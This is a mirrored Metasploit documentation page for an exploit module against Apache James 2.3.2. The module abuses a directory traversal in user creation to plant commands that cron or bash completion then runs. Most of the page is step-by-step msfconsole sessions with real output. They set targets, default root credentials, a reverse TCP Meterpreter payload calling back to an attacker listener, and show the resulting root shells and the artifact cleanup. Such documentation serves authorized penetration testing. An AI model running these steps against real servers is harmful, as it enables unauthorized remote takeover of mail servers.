CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/smtp/apache_james_exec.md
Views: 1904

Vulnerable Application

This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here: https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf

Verification Steps

1. Start msfconsole

2. DO: Load module exploit/linux/smtp/apache_james_exec

3. DO: Set the remote and local options: rhosts, lhosts, lport

4. DO: Set the preferred payload

5. DO: Run the check method to determine vulnerability

6. DO: Run the exploit

7. The payload will connect to the listener if the exploit is successful

Options

USERNAME: The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.

PASSWORD: The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.

ADMINPORT: The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.

RHOSTS: The IP address of the vulnerable server.

RPORT: The port number of the SMTP service.

POP3PORT The port for the POP3 Apache James Service. By default this '110'.

Scenarios

If using Cron exploitation method: This method allows for automatic execution of the payload with no user interaction required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the mail objects.

1. Load the module:

  msf5 > use exploit/linux/smtp/apache_james_exec

2. Set remote and local options:

  msf5 exploit(linux/smtp/apache_james_exec) > set target 1
  target => 1
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts  192.168.224.169
  rhosts =>  192.168.224.169

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
  lhost => 192.168.224.167
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
  lport => 4444

3. Set payload:

  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp

4. Check version and run exploit:

  msf5 exploit(linux/smtp/apache_james_exec) > check
  [*] 192.168.224.164:25 - The target appears to be vulnerable.
  msf5 exploit(linux/smtp/apache_james_exec) > exploit
  
  [*] Started reverse TCP handler on 192.168.224.167:4444
  [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload
  [*] Sending stage (3021284 bytes) to 192.168.224.169
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.169:38694) at 2020-02-02 16:30:02 -0800
  [*] 192.168.224.169:25 - Command Stager progress - 100.00% done (812/812 bytes)

  meterpreter >

If using Bash Completion: This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the /etc/bash_completion.d directory and the malicious user account.

1. Load the module:

  msf5 > use exploit/linux/smtp/apache_james_exec

2. Set remote and local options:

  msf5 exploit(linux/smtp/apache_james_exec) > set target 0
  target => 0
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164
  rhosts => 192.168.224.164

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
  lhost => 192.168.224.167
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
  lport => 4444

3. Set payload:

  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp

4. Check version and run exploit:

  msf5 exploit(linux/smtp/apache_james_exec) > check
  [*] 192.168.224.164:25 - The target appears to be vulnerable.
  msf5 exploit(linux/smtp/apache_james_exec) > exploit

  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)

5. Set up and run listener (Can be done before running exploit):

  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lport 4444
  lport => 4444
  msf5 exploit(multi/handler) > set lhost 192.168.224.167
  lhost => 192.168.224.167

  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.224.167:4444
  [*] Sending stage (3021284 bytes) to 192.168.224.164
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800

  meterpreter >

Targets

  Id  Name 
  --  ----
  0   Bash Completion
  1   Cron

References

  1. https://www.exploit-db.com/exploits/35513

  2. https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf